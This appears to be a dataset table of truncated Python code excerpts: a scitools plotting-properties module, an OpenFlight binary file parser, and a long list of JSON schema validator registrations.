input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<gh_stars>10-100
import pickle, os, operator, pprint
from scitools.numpyutils import seq, iseq, asarray, ones, zeros, sqrt, shape, \
ravel, meshgrid, rank, squeeze, reshape, ndgrid, size, ndarray
from scitools.globaldata import backend
from .misc import _check_xyz, _check_xyuv, _check_xyzuvw, _check_xyzv, \
_check_size, _check_type, _toggle_state, _update_from_config_file
from warnings import warn
def docadd(comment, *lists, **kwargs):
    """
    Build a string suitable for appending to (or inserting in) a doc
    string: a heading line followed by a nicely formatted, sorted list
    of items.  Typically used to add lists of valid options to a doc
    string, where the options live as static list data in a class.

    Example on usage:
    # add to the class doc string:
    __doc__ += docadd('Keywords for the setp method', list(_local_attrs.keys()))

    # add to a method (get) doc string:
    get.__doc__ += docadd('Keywords for the setp method',
                          list(BaseClass._local_attrs.keys()),
                          list(SomeSubClass._local_attrs.keys()))
    """
    # Merge all the given lists into one sorted list.
    merged = []
    for one_list in lists:
        merged.extend(one_list)
    merged.sort()

    text = '\n%s:\n' % comment
    text += ' ' + pprint.pformat(merged)[1:-1]  # strip off leading [ and trailing ]

    # Indent every line after the two heading lines and prefix it with
    # '- ' so it renders as a list in some markup languages.
    pad = ' ' * kwargs.get('indent', 4)
    lines = text.split('\n')
    for i, line in enumerate(lines):
        if i >= 2 and line.strip() != '':
            lines[i] = pad + '- ' + line
    return '\n'.join(lines)
class MaterialProperties(object):
    """
    Storage of various properties for a material on a PlotProperties object.
    """
    # Defaults for all recognized material keywords; None means the
    # backend decides.
    _local_prop = {
        'opacity': None,
        'ambient': None,
        'diffuse': None,
        'specular': None,
        'specularpower': None,
    }
    _update_from_config_file(_local_prop)  # get defaults from scitools.cfg
    __doc__ += docadd('Keywords for the setp method', list(_local_prop.keys()))

    def __init__(self, **kwargs):
        """Initialize with the class defaults, then apply kwargs via setp."""
        self._prop = {}
        self._prop.update(self._local_prop)
        self.setp(**kwargs)

    def __str__(self):
        return pprint.pformat(self._prop)

    def setp(self, **kwargs):
        """Set any known material property; values are coerced to float."""
        for key in self._prop:
            if key in kwargs:
                _check_type(kwargs[key], key, (int, float))
                self._prop[key] = float(kwargs[key])

    def getp(self, name):
        """Return the value of property *name*; raise KeyError if unknown."""
        try:
            return self._prop[name]
        except KeyError:
            # Was a bare ``except:`` — only a missing key can occur on the
            # lookup, so catch exactly that and re-raise with context.
            raise KeyError('%s.getp: no parameter with name "%s"' % \
                           (self.__class__.__name__, name))
class PlotProperties(object):
    """
    Storage of various properties needed for plotting, such as line types,
    surface features, contour values, etc.
    Different subclasses (Line, Surface, Contours) are specialized
    for different kinds of plots.

    All properties are stored in the dictionary self._prop.
    """
    # Single-character style codes (Matlab-like); the colour order below
    # also determines which colour an unset curve receives.
    _colors = "b r g m c y k w".split()  # colororder determines unset colors
    _markers = "o s v + ^ x d * < > p h .".split()
    # Pair each colour with a default marker (b->o, r->s, ...).
    _colors2markers = dict([(color, marker)
                            for color, marker in zip(_colors, _markers)])
    # NOTE: two-character styles ('-.', '--') come before '-' so that
    # substring matching in setformat finds them first.
    _linestyles = ": -. -- -".split()
    _sizes = "1 2 3 4 5 6 7 8 9".split()
    # Human-readable names for the single-character codes above.
    _styledoc = {'y': 'yellow',
                 'm': 'magenta',
                 'c': 'cyan',
                 'r': 'red',
                 'g': 'green',
                 'b': 'blue',
                 'w': 'white',
                 'k': 'black',

                 '.': 'point',
                 'o': 'circle',
                 'x': 'x-mark',
                 '+': 'plus',
                 '*': 'star',
                 's': 'square',
                 'd': 'diamond',
                 'v': 'triangle (down)',
                 '^': 'triangle (up)',
                 '<': 'triangle (left)',
                 '>': 'triangle (right)',
                 'p': 'pentagram',
                 'h': 'hexagram',

                 '-': 'solid',
                 ':': 'dotted',
                 '-.': 'dashdot',
                 '--': 'dashed',
                 }
    __doc__ += 'Valid symbols::\n      - Colors: %s\n      - Markers: %s\n      - Linestyles: %s\n      - Sizes: %s\n      - Styles:\n%s' % (_colors, _markers, _linestyles, _sizes, pprint.pformat(_styledoc)[1:-1])

    # Defaults for all per-item plot properties.
    _local_prop = {
        'description': '',
        'legend': '',
        'xlim': (0, 0), 'ylim': (0, 0), 'zlim': (0, 0),
        'dims': (0, 0, 0),
        'numberofpoints': 0,
        'function': '',  # the function that created this item
        'linecolor': '',
        'linewidth': '',
        'linetype': '',
        'linemarker': '',
        'facecolor': '',
        'edgecolor': '',
        'pointsize': 1.0,
        'material': None,
        'memoryorder': 'yxz',  # FIXME: this is deprecated and will be removed
        'indexing': 'ij',  # 'xy' is Cartesian indexing, 'ij' matrix indexing
        'default_lines': 'with_markers'  # 'plain'
    }
    _update_from_config_file(_local_prop)  # get defaults from scitools.cfg
    __doc__ += docadd('Keywords for the setp method', list(_local_prop.keys()))
def __init__(self, **kwargs):
    """Create a property set primed with the class-level defaults."""
    # NOTE: kwargs are accepted but not applied here; subclasses are
    # expected to call setp themselves.
    self._prop = dict(PlotProperties._local_prop)
    self._prop['material'] = MaterialProperties()
def __str__(self):
    """Pretty-print the property dict, summarizing large array values."""
    summary = {}
    for key, value in self._prop.items():
        is_big = (isinstance(value, (list, tuple, ndarray))
                  and len(ravel(value)) > 3)
        if is_big:
            # Avoid dumping large data; show type and shape instead.
            summary[key] = '%s with shape %s' % (type(value), shape(value))
        else:
            summary[key] = value
    return pprint.pformat(summary)
# repr is maybe not smart since
# >>> plot(...)
# will then return Line, Surface,
# etc which automatically gets printed.
# Better to make a dump function
# that one can call on the current figure f.ex.
#def __repr__(self):
# return self.__str__()
def dump(self):
    """Return a string dump of the parameters of this object."""
    return self.__str__()
def setp(self, **kwargs):
    """
    Set plot properties.

    The method adds the argument value to the self._prop
    (if the value is legal).  Unknown keywords are silently passed on
    to the material properties object at the end.

    Raises ValueError for illegal values of linecolor, linetype,
    linemarker, memoryorder, or indexing.
    """
    if 'description' in kwargs:
        descr = kwargs['description']
        self._prop['description'] = descr
        # descr is on the form 'mesh: 3D mesh' (say); the part before
        # the colon names the function that created this item.
        self._prop['function'] = descr.split(':')[0]

    if 'legend' in kwargs:
        self._prop['legend'] = str(kwargs['legend'])

    if 'linewidth' in kwargs:
        _check_type(kwargs['linewidth'], 'linewidth', (float, int))
        self._prop['linewidth'] = float(kwargs['linewidth'])

    if 'linecolor' in kwargs:
        color = kwargs['linecolor']
        # Accept either a single-character colour code or an RGB triple.
        if isinstance(color, str) and color in self._colors:
            self._prop['linecolor'] = color
        elif isinstance(color, (list, tuple)) and len(color) == 3:
            self._prop['linecolor'] = color
        else:
            raise ValueError("linecolor must be '%s', not '%s'" % \
                             (self._colors, kwargs['linecolor']))

    if 'linetype' in kwargs:
        if kwargs['linetype'] in self._linestyles:
            self._prop['linetype'] = kwargs['linetype']
        else:
            raise ValueError("linetype must be '%s', not '%s'" % \
                             (self._linestyles, kwargs['linetype']))

    if 'linemarker' in kwargs:
        if kwargs['linemarker'] in self._markers:
            self._prop['linemarker'] = kwargs['linemarker']
        else:
            raise ValueError("linemarker must be '%s', not '%s'" % \
                             (self._markers, kwargs['linemarker']))

    if 'facecolor' in kwargs:
        self._prop['facecolor'] = kwargs['facecolor']

    if 'edgecolor' in kwargs:
        self._prop['edgecolor'] = kwargs['edgecolor']

    if 'memoryorder' in kwargs:
        # Deprecated spelling; translate to the 'indexing' keyword but
        # keep the old value stored for backward compatibility.
        msg = "Keyword argument 'memoryorder' is deprecated and will be " \
              "removed in the future. Please use the 'indexing' keyword " \
              "argument instead."
        warn(msg, DeprecationWarning)
        if kwargs['memoryorder'] == 'xyz':
            self._prop['indexing'] = 'ij'
            self._prop['memoryorder'] = 'xyz'
        elif kwargs['memoryorder'] == 'yxz':
            self._prop['indexing'] = 'xy'
            self._prop['memoryorder'] = 'yxz'
        else:
            raise ValueError("memoryorder must be 'xyz' or 'yxz', not %s"\
                             % kwargs['memoryorder'])

    if 'indexing' in kwargs:
        if kwargs['indexing'] in ['xy', 'ij']:
            self._prop['indexing'] = kwargs['indexing']
        else:
            raise ValueError("indexing must be 'xy' or 'ij', not '%s'" \
                             % kwargs['indexing'])

    # set material properties (any remaining keywords it recognizes):
    self._prop['material'].setp(**kwargs)
def getp(self, prm_name=None):
    """
    Return the value of the parameter with name prm_name.
    If the name is None, the dictionary with all parameters
    is returned.  Unknown names yield None (historical behavior
    kept for backward compatibility).
    """
    if prm_name == 'memoryorder':
        msg = "Keyword argument 'memoryorder' is deprecated and will be " \
              "removed in the future. Please use the 'indexing' keyword " \
              "argument instead."
        warn(msg, DeprecationWarning)
    if prm_name is None:
        return self._prop
    else:
        # Was a bare ``except:``, which also swallowed unrelated errors;
        # only a missing key can occur on this dict lookup.
        try:
            return self._prop[prm_name]
        except KeyError:
            return None
def setformat(self, format):
    """
    Extract the right values for color, linetype, marker, etc. given
    a Matlab-like format string for a curve (e.g., 'r-').
    The extracted values are stored in self._prop (with keys like
    'linecolor', 'linetype', etc.).
    Erroneous chars will be ignored.
    When there are multiple format characters for a property, the last
    one will count.
    """
    if isinstance(format, str) and len(format) > 0:
        color = ""
        linetype = ""
        marker = ""
        linewidth = ""
        pointsize = ""
        # Notice that '--' and '-.' are before '-' in the _linestyles
        # alphabet, so two-character styles are matched first.
        for item in self._linestyles:
            if item in format:
                linetype = item
                break
        for item in format:
            if item in self._colors:
                color = item
            elif item in self._markers:
                if item == '.':
                    # A lone '.' that is already part of the matched
                    # linestyle ('-.') is not a point marker.
                    if ('.' in linetype) and (format.count('.') == 1):
                        pass
                    else:
                        marker = item  # same as '.'
                else:
                    marker = item
            elif item in self._sizes:
                # this int describes pointsize or linewidth (stored as
                # the original character, matching historical behavior)
                self._prop['pointsize'] = item
                self._prop['linewidth'] = item
        # BUG FIX: the original used Python 2 ``print`` statements, which
        # are syntax errors under Python 3; print() behaves identically
        # on both for a single argument.
        if color in self._colors or color == "":
            self._prop['linecolor'] = color
        else:
            print("Illegal line color choice, %s is not known" % color)
        if linetype != "" or marker != "":
            if linetype in self._linestyles:
                self._prop['linetype'] = linetype
            elif linetype == "":
                self._prop['linetype'] = linetype  # Since marker is known
            else:
                print("Illegal line style choice, %s is not known" % \
                      linetype)
            if marker in self._markers:
                self._prop['linemarker'] = marker
            elif marker == "":
                self._prop['linemarker'] = marker  # Since linetype is known
            else:
                print("Illegal line marker choice, %s is not known" % \
                      marker)
def get_limits(self):
    """
    Return the limits on the x, y, and z axis as one concatenated
    tuple: (xmin, xmax, ymin, ymax, zmin, zmax).
    """
    prop = self._prop
    return prop['xlim'] + prop['ylim'] + prop['zlim']
def _set_lim(self, a, name, adj_step=0.03):
if isinstance(a, ndarray):
try:
amin = a.min()
| |
newObject['AltColourIdx'] = self._readUInt()
if newObject['AltColourIdx'] == -1:
newObject['AltColourIdx'] = None
self._skip(2)
newObject['ShaderIdx'] = self._readShort()
if newObject['ShaderIdx'] == -1:
newObject['ShaderIdx'] = None
self._addObject(newObject)
def _opPush(self):
    """Opcode 10: open a new child level on the active record stack."""
    if self._RecordType == "Tree":
        stack, node = self._TreeStack, self.Records["Tree"]
    elif self._RecordType == "Instances":
        stack, node = self._InstanceStack, self.Records["Instances"]
    else:
        raise Exception("Unable to determine stack type.")
    # Walk down to the currently open node, then append a fresh level
    # and record its index on the stack.
    for idx in stack:
        node = node[idx]
    stack.append(len(node))
    node.append([])
def _opPop(self):
    """Opcode 11: close the innermost level of the active record stack."""
    kind = self._RecordType
    if kind == "Tree":
        if not self._TreeStack:
            raise Exception("Tree stack is empty: nothing to pop.")
        self._TreeStack.pop()
        return
    if kind != "Instances":
        raise Exception("Unable to determine stack type.")
    self._InstanceStack.pop()
    # Popping back to the instance root ends the instance definition;
    # subsequent records go to the tree again.
    if len(self._InstanceStack) == 1:
        self._RecordType = "Tree"
        self._InstanceStack = []
def _opDoF(self):
    """Opcode 14: read a degree-of-freedom record."""
    newObject = {
        'Datatype': 'DegreeOfFreedom',
        'ASCIIID': self._readString(8),
    }
    self._skip(4)  # reserved area

    # Three reference points, each stored as a 1x3 row of doubles.
    for pointName in ('DoFOrigin', 'DoFPointx', 'DoFPointxy'):
        row = np.zeros((1, 3))
        for col in range(3):
            row[0, col] = self._readDouble()
        newObject[pointName] = row

    # Min/Max/Current/Increment for each motion variable, in file order.
    for base in ('z', 'y', 'x', 'pitch', 'roll', 'yaw',
                 'zScale', 'yScale', 'xScale'):
        for suffix in ('Min', 'Max', 'Current', 'Increment'):
            newObject[base + suffix] = self._readDouble()

    newObject['Flags'] = self._readUInt()
    self._skip(4)
    self._addObject(newObject)
def _opPushSubface(self):
    """Opcode 19: push a level, then record a PushSubface marker."""
    self._opPush()
    self._addObject({'Datatype': 'PushSubface'})
def _opPopSubface(self):
    """Opcode 20: record a PopSubface marker, then pop a level."""
    self._addObject({'Datatype': 'PopSubface'})
    self._opPop()
def _opPushExtension(self):
    """Opcode 21: push a level and record the extension's vertex reference."""
    record = {'Datatype': 'PushExtension'}
    self._skip(18)  # reserved
    record['VertexRefIdx'] = self._readUShort()
    self._opPush()
    self._addObject(record)
def _opPopExtension(self):
    """Opcode 22: record the extension's vertex reference, then pop."""
    record = {'Datatype': 'PopExtension'}
    self._skip(18)  # reserved
    record['VertexRefIdx'] = self._readUShort()
    self._addObject(record)
    self._opPop()
def _opContinuation(self):
    """Opcode 23: continuation records extend the previous record and must
    be consumed by that record's own handler, so reaching here is an error."""
    handler = self._OpCodes[self._PreviousOpCode][2]
    raise Exception("Unexpected continuation record. This should have been handled by the " + handler + " function.")
def _opComment(self):
    """Opcode 31: read a comment record via the in-memory chunk buffer."""
    # Pull the whole record into memory so the modified read functions
    # can consume it as a chunk.
    self._readChunk()
    record = {
        'Datatype': 'Comment',
        # The comment text runs to the end of the chunk.
        'Text': self._readString(len(self._Chunk), fromChunk=True),
    }
    # Chunk fully consumed; release it.
    self._Chunk = None
    self._addObject(record)
def _opColourPalette(self):
    """Opcode 32: read the colour palette, optionally with colour names."""
    recordLength = self._readUShort()
    record = {'Datatype': 'ColourPalette'}
    self._skip(128)  # reserved area
    brightest = np.zeros((1024, 1))
    for row in range(1024):
        brightest[row, 0] = self._readUInt()
    record['BrightestRGB'] = brightest
    if recordLength > 4228:
        # The palette also carries named colours.
        record['ColourNames'] = {}
        for _ in range(self._readUInt()):
            nameLength = self._readUShort()
            # NOTE(review): nameLength is read but unused; the string read
            # below uses recordLength - 8 instead — verify against the
            # OpenFlight spec before relying on multi-name palettes.
            self._skip(2)
            colourIdx = self._readUShort()
            self._skip(2)
            record['ColourNames'][colourIdx] = self._readString(recordLength - 8)
    self._addObject(record)
def _opLongID(self):
    """Opcode 33: read a long ASCII identifier record."""
    record = {'Datatype': 'LongID'}
    recordLength = self._readUShort()
    # The ID occupies the record minus the 4 header bytes already read.
    record['ASCIIID'] = self._readString(recordLength - 4)
    self._addObject(record)
def _opMatrix(self):
    """Opcode 49: read a 4x4 matrix of floats, filled row by row."""
    newObject = np.zeros((4, 4))
    for n in range(16):
        # BUG FIX: the original indexed with ``int(n) / 4``, which is a
        # float under Python 3 and breaks the indexing; use floor
        # division, which is identical under Python 2.
        newObject[n // 4, n % 4] = self._readFloat()
    # Inject into the record tree
    self._addObject(newObject)
def _opVector(self):
    """Opcode 50: read a 3-component (i, j, k) vector of floats."""
    record = {'Datatype': 'Vector'}
    for axis in ('i', 'j', 'k'):
        record[axis] = self._readFloat()
    self._addObject(record)
def _opMultitexture(self):
    """Opcode 52: read a multitexture record (one ushort per field per layer)."""
    recordLength = self._readUShort()
    newObject = {'Datatype': 'Multitexture', 'Mask': self._readUInt()}
    varNames = ['TextureIndex', 'Effect', 'TextureMappingIndex', 'TextureData']
    for varName in varNames:
        newObject[varName] = []
    # BUG FIX: the original used true division, which yields a float under
    # Python 3 and makes range() fail; floor division is identical under
    # Python 2.
    for _ in range((recordLength // 8) - 1):
        for varName in varNames:
            newObject[varName].append(self._readUShort())
    self._addObject(newObject)
def _opUVList(self):
    """Opcode 53: read per-vertex UV coordinates for the active layers."""
    newObject = {'Datatype': 'UVList'}
    recordLength = self._readUShort()
    newObject['AttributeMask'] = self._readUInt()
    # Decode which of the 7 possible layers are present (one mask bit each).
    mask = 0x00000001
    flags = [False] * 7
    for idx in range(7):
        if newObject['AttributeMask'] & mask > 0:
            flags[idx] = True
        mask <<= 1
    Layers = ['Layer' + str(n + 1) for n in range(7) if flags[n]]
    varNames = ['U0', 'V0', 'U100', 'V100']
    # BUG FIX: the original used true division, which is a float under
    # Python 3 and makes range() fail; floor division is identical under
    # Python 2.  NOTE(review): an empty layer list still divides by zero,
    # exactly as in the original — confirm whether that can occur.
    for vertexIdx in range((recordLength - 8) // (8 * len(Layers))):
        vertexName = 'Vertex' + str(vertexIdx)
        newObject[vertexName] = dict()
        for layer in Layers:
            newObject[vertexName][layer] = dict()
            for varName in varNames:
                newObject[vertexName][layer][varName] = self._readFloat()
    # Finally, commit object to stack
    self._addObject(newObject)
def _opBSP(self):
    """Opcode 55: read a binary separating plane record."""
    record = {
        'Datatype': 'BinarySeparatingPlane',
        'ASCIIID': self._readString(8),
    }
    self._skip(4)  # reserved
    coeffs = np.zeros((1, 4))
    for col in range(4):
        coeffs[0, col] = self._readDouble()
    record['PlaneEquationCoeffs'] = coeffs
    self._addObject(record)
def _opReplicate(self):
    """Opcode 60: read a replicate record (number of replications)."""
    record = {
        'Datatype': 'Replicate',
        'NoReplications': self._readUShort(),
    }
    self._skip(2)  # reserved
    self._addObject(record)
def _opInstRef(self):
    """Opcode 61: insert a previously defined instance by its number."""
    instance = self._readUInt()
    instances = self.Records["Instances"]
    if instance not in instances:
        raise Exception("Could not find an instance to reference")
    # Place the stored instance definition at the current tree position.
    self._addObject(instances[instance])
def _opInstDef(self):
    """Opcode 62: start a new instance definition."""
    # All records that follow belong to this instance until it is popped.
    self._RecordType = "Instances"
    instance = self._readUInt()
    if instance in self.Records["Instances"]:
        raise Exception("Instance definition number has already been declared.")
    # Fresh definition: create its container and open it on the stack.
    self.Records["Instances"][instance] = []
    self._InstanceStack.append(instance)
def _opExtRef(self):
    """Opcode 63: read an external reference record and load the referenced
    file once per distinct filename into the top-level External cache."""
    newObject = dict()
    newObject['Datatype'] = "ExternalReference"
    newObject['ASCIIPath'] = self._readString(200)
    self._skip(4)
    newObject["Flags"] = self._readUInt()
    newObject["BoundingBox"] = self._readUShort()
    self._skip(2)
    # Clean the pathname and make it usable for this system
    fileName = self._cleanExternalFilename(newObject['ASCIIPath'])
    if self._parent is None:
        # This is the top-level reader: cache external databases locally.
        if fileName not in self.Records['External']:
            # Not referenced before: read the file with a child reader.
            extdb = OpenFlight(fileName, verbose=self._verbose,
                               parent=self, tabbing=self._tabbing + 1)
            extdb.ReadFile()
            self.Records['External'][fileName] = extdb.Records
            extdb = None
    else:
        # Child reader: the cache lives on the top-level parent.
        if fileName not in self._parent.Records['External']:
            extdb = OpenFlight(fileName, verbose=self._verbose,
                               parent=self._parent,
                               tabbing=self._tabbing + 1)
            extdb.ReadFile()
            # BUG FIX: the original stored under the undefined name
            # ``filename`` (NameError at runtime); use ``fileName``.
            self._parent.Records['External'][fileName] = extdb.Records
            extdb = None
    # Inject into tree
    self._addObject(newObject)
def _opTexturePalette(self):
    """Opcode 64: read a texture palette entry and parse the texture file
    once per distinct filename."""
    record = {'Datatype': "TexturePalette"}
    record['Filename'] = self._readString(200)
    record['TexturePatternIdx'] = self._readUInt()
    location = np.zeros((1, 2))
    for col in range(2):
        location[0, col] = self._readUInt()
    record['LocationInTexturePalette'] = location
    # The texture cache lives on the top-level reader (self when this is
    # the parent, otherwise the parent's records).
    if self._parent is None:
        cache = self.Records['External']
    else:
        cache = self._parent.Records['External']
    if record['Filename'] not in cache:
        # Not referenced before: parse the texture file now.
        cache[record['Filename']] = self._parseTextureFile(record['Filename'])
    self._addObject(record)
    # Next append to the textures list.
    self.Records['Textures'].append(record)
def _opVertexPalette(self):
    """Opcode 67: read the vertex palette header."""
    record = {'Datatype': "VertexPalette", 'Length': self._readUInt()}
    self._addObject(record)
    # Advance the byte offset used to key vertices in Records['Vertices'].
    self._VertexCounter += 8
def _opVertexColour(self):
    # Opcode 68: vertex-with-colour record.
    newObject = dict()
    newObject['Datatype'] = "VertexColour"
    newObject['ColourNameIdx'] = self._readUShort()
    newObject['Flags'] = self._readUShort()
    # Vertex position as a 1x3 row of doubles.
    newObject['Coordinate'] = np.zeros((1, 3))
    # For x, y and z
    for colIdx in range(3):
        newObject['Coordinate'][0, colIdx] = self._readDouble()
    newObject['PackedColour'] = self._readUInt()
    newObject['VertexColourIndex'] = self._readUInt()
    self._addObject(newObject)
    # Key this vertex by its byte offset within the vertex palette.
    # NOTE(review): unlike _opVertexPalette, no _VertexCounter increment is
    # visible here — it may occur just past this excerpt; confirm against
    # the full file.
    self.Records['Vertices'][self._VertexCounter] = newObject
    self.Records['VertexUV'].append(None)
| |
self.json_schema_validators['jsd_fc9a4ee495785518bd2251b6b4fb41f4_v3_0_0'] =\
JSONSchemaValidatorFc9A4Ee495785518Bd2251B6B4Fb41F4_v3_0_0()
self.json_schema_validators['jsd_ff0055f9ef115a42bea6ffdd8e57d41b_v3_0_0'] =\
JSONSchemaValidatorFf0055F9Ef115A42Bea6Ffdd8E57D41B_v3_0_0()
if version == '3.1.0':
self.json_schema_validators['jsd_f2fcf04554db9ea4cdc3a7024322_v3_1_0'] =\
JSONSchemaValidatorF2FcF04554Db9Ea4Cdc3A7024322_v3_1_0()
self.json_schema_validators['jsd_de7c6f75f68b0d7df00dc72808d_v3_1_0'] =\
JSONSchemaValidatorDe7C6F75F68B0D7Df00Dc72808D_v3_1_0()
self.json_schema_validators['jsd_b050fff6a5302ace3e16674c8b19a_v3_1_0'] =\
JSONSchemaValidatorB050FFf6A5302Ace3E16674C8B19A_v3_1_0()
self.json_schema_validators['jsd_a5a26c964e53b3be3f9f0c103f304c_v3_1_0'] =\
JSONSchemaValidatorA5A26C964E53B3Be3F9F0C103F304C_v3_1_0()
self.json_schema_validators['jsd_eb42e79d5cc38bd1a6eef20613d6_v3_1_0'] =\
JSONSchemaValidatorEb42E79D5Cc38Bd1A6Eef20613D6_v3_1_0()
self.json_schema_validators['jsd_c21f51995bff8d6468a1e9c0b2e9_v3_1_0'] =\
JSONSchemaValidatorC21F51995Bff8D6468A1E9C0B2E9_v3_1_0()
self.json_schema_validators['jsd_db1d9dda53369e35d33138b29c16_v3_1_0'] =\
JSONSchemaValidatorDb1D9Dda53369E35D33138B29C16_v3_1_0()
self.json_schema_validators['jsd_be5b1e320e55f4a181370417471d9e_v3_1_0'] =\
JSONSchemaValidatorBe5B1E320E55F4A181370417471D9E_v3_1_0()
self.json_schema_validators['jsd_ae4af25df565334b20a24c4878b68e4_v3_1_0'] =\
JSONSchemaValidatorAe4Af25Df565334B20A24C4878B68E4_v3_1_0()
self.json_schema_validators['jsd_d39172f68fd5cbd897f03f1440f98a4_v3_1_0'] =\
JSONSchemaValidatorD39172F68Fd5Cbd897F03F1440F98A4_v3_1_0()
self.json_schema_validators['jsd_df78c9a3f72584dbd1c7b667b0e312f_v3_1_0'] =\
JSONSchemaValidatorDf78C9A3F72584DBd1C7B667B0E312F_v3_1_0()
self.json_schema_validators['jsd_c23243c950f29b51f502c03d7058_v3_1_0'] =\
JSONSchemaValidatorC23243C950F29B51F502C03D7058_v3_1_0()
self.json_schema_validators['jsd_a518d5655f69e8687c9c98740c6_v3_1_0'] =\
JSONSchemaValidatorA518D5655F69E8687C9C98740C6_v3_1_0()
self.json_schema_validators['jsd_ca61ff725fedb94fba602d7afe46_v3_1_0'] =\
JSONSchemaValidatorCa61Ff725FedB94FBa602D7Afe46_v3_1_0()
self.json_schema_validators['jsd_ebcdc835e9b8d6844c1da6cf252_v3_1_0'] =\
JSONSchemaValidatorEbcDc835E9B8D6844C1Da6Cf252_v3_1_0()
self.json_schema_validators['jsd_bc936bcb25464b9f3f227647b0443_v3_1_0'] =\
JSONSchemaValidatorBc936Bcb25464B9F3F227647B0443_v3_1_0()
self.json_schema_validators['jsd_b05e80058df96e685baa727d578_v3_1_0'] =\
JSONSchemaValidatorB05E80058Df96E685Baa727D578_v3_1_0()
self.json_schema_validators['jsd_a66f9651fca28e85b97cf1b968_v3_1_0'] =\
JSONSchemaValidatorA66F9651FcA28E85B97Cf1B968_v3_1_0()
self.json_schema_validators['jsd_b4e8d45639975c226dacd53e7b_v3_1_0'] =\
JSONSchemaValidatorB4E8D45639975C226Dacd53E7B_v3_1_0()
self.json_schema_validators['jsd_e6d1b224e058288a8c4d70be72c9a6_v3_1_0'] =\
JSONSchemaValidatorE6D1B224E058288A8C4D70Be72C9A6_v3_1_0()
self.json_schema_validators['jsd_f6de5797735bbd95dc8683c6a7aebf_v3_1_0'] =\
JSONSchemaValidatorF6De5797735Bbd95Dc8683C6A7Aebf_v3_1_0()
self.json_schema_validators['jsd_a693347bdd15bb19d69a75f088498ce_v3_1_0'] =\
JSONSchemaValidatorA693347Bdd15Bb19D69A75F088498Ce_v3_1_0()
self.json_schema_validators['jsd_b40ad23ab0a5a7b8adade320c8912e7_v3_1_0'] =\
JSONSchemaValidatorB40Ad23Ab0A5A7B8AdaDe320C8912E7_v3_1_0()
self.json_schema_validators['jsd_c0689e940ba5526946ad15976cc3365_v3_1_0'] =\
JSONSchemaValidatorC0689E940Ba5526946AD15976Cc3365_v3_1_0()
self.json_schema_validators['jsd_cab8440e21553c3a807d23d05e5e1aa_v3_1_0'] =\
JSONSchemaValidatorCab8440E21553C3A807D23D05E5E1Aa_v3_1_0()
self.json_schema_validators['jsd_d0290eb241f5bd79221afc8d6cb32da_v3_1_0'] =\
JSONSchemaValidatorD0290Eb241F5Bd79221Afc8D6Cb32Da_v3_1_0()
self.json_schema_validators['jsd_d17bf558051575aba9f7435c7fcbe05_v3_1_0'] =\
JSONSchemaValidatorD17Bf558051575ABa9F7435C7Fcbe05_v3_1_0()
self.json_schema_validators['jsd_d79b507bda155c180d42f0a67ef64d5_v3_1_0'] =\
JSONSchemaValidatorD79B507Bda155C180D42F0A67Ef64D5_v3_1_0()
self.json_schema_validators['jsd_dbe47028859573988880de76fec0936_v3_1_0'] =\
JSONSchemaValidatorDbe47028859573988880De76Fec0936_v3_1_0()
self.json_schema_validators['jsd_f15d19b858d59218ab56b7323ca2fae_v3_1_0'] =\
JSONSchemaValidatorF15D19B858D59218Ab56B7323Ca2Fae_v3_1_0()
self.json_schema_validators['jsd_fc1c74b35ae5050b4f7fd702570ad5b_v3_1_0'] =\
JSONSchemaValidatorFc1C74B35Ae5050B4F7Fd702570Ad5B_v3_1_0()
self.json_schema_validators['jsd_eb6323be425816a4116eea48f16f4b_v3_1_0'] =\
JSONSchemaValidatorEb6323Be425816A4116Eea48F16F4B_v3_1_0()
self.json_schema_validators['jsd_fc6670fd50dfb04b1f6b16981256_v3_1_0'] =\
JSONSchemaValidatorFc6670Fd50DfB04B1F6B16981256_v3_1_0()
self.json_schema_validators['jsd_f8082b07ce528f82545e210b84d7de_v3_1_0'] =\
JSONSchemaValidatorF8082B07Ce528F82545E210B84D7De_v3_1_0()
self.json_schema_validators['jsd_cb625d5ad0ad76b93282f5818a_v3_1_0'] =\
JSONSchemaValidatorCb625D5Ad0Ad76B93282F5818A_v3_1_0()
self.json_schema_validators['jsd_f78898b7d655b2b81085dc7c0a964e_v3_1_0'] =\
JSONSchemaValidatorF78898B7D655B2B81085Dc7C0A964E_v3_1_0()
self.json_schema_validators['jsd_a746755c588c928d15a59f8a693d_v3_1_0'] =\
JSONSchemaValidatorA746755C588C928D15A59F8A693D_v3_1_0()
self.json_schema_validators['jsd_c288192f954309b4b35aa612ff226_v3_1_0'] =\
JSONSchemaValidatorC288192F954309B4B35Aa612Ff226_v3_1_0()
self.json_schema_validators['jsd_a4d5b5da6a50bfaaecc180543fd952_v3_1_0'] =\
JSONSchemaValidatorA4D5B5Da6A50BfAaecC180543Fd952_v3_1_0()
self.json_schema_validators['jsd_a99695fd5ee0b00efce79a5761ff_v3_1_0'] =\
JSONSchemaValidatorA99695Fd5Ee0B00EFce79A5761Ff_v3_1_0()
self.json_schema_validators['jsd_da0a59db7654cfa89df49ca3ac3414_v3_1_0'] =\
JSONSchemaValidatorDa0A59Db7654CfA89DF49Ca3Ac3414_v3_1_0()
self.json_schema_validators['jsd_a31eb33e3535754b3f754a9199e0d25_v3_1_0'] =\
JSONSchemaValidatorA31Eb33E3535754B3F754A9199E0D25_v3_1_0()
self.json_schema_validators['jsd_acfdb4060de5a1895b383238c205986_v3_1_0'] =\
JSONSchemaValidatorAcfdb4060De5A1895B383238C205986_v3_1_0()
self.json_schema_validators['jsd_b94d7d3f0ed5d0b938151ae2cae9fa4_v3_1_0'] =\
JSONSchemaValidatorB94D7D3F0Ed5D0B938151Ae2Cae9Fa4_v3_1_0()
self.json_schema_validators['jsd_b994e6c8b8d53f29230686824c9fafa_v3_1_0'] =\
JSONSchemaValidatorB994E6C8B8D53F29230686824C9Fafa_v3_1_0()
self.json_schema_validators['jsd_d8c7ba0cb8f56d99135e16d2d973d11_v3_1_0'] =\
JSONSchemaValidatorD8C7Ba0Cb8F56D99135E16D2D973D11_v3_1_0()
self.json_schema_validators['jsd_ea2c4586b845888b2a9375126f70de2_v3_1_0'] =\
JSONSchemaValidatorEa2C4586B845888B2A9375126F70De2_v3_1_0()
self.json_schema_validators['jsd_eb3472c4de150828b2dae61e2285313_v3_1_0'] =\
JSONSchemaValidatorEb3472C4De150828B2DAe61E2285313_v3_1_0()
self.json_schema_validators['jsd_e07cb8ea65820863cce345c67926b_v3_1_0'] =\
JSONSchemaValidatorE07Cb8Ea65820863CCe345C67926B_v3_1_0()
self.json_schema_validators['jsd_fc7103b05336a7960d9f34033eca_v3_1_0'] =\
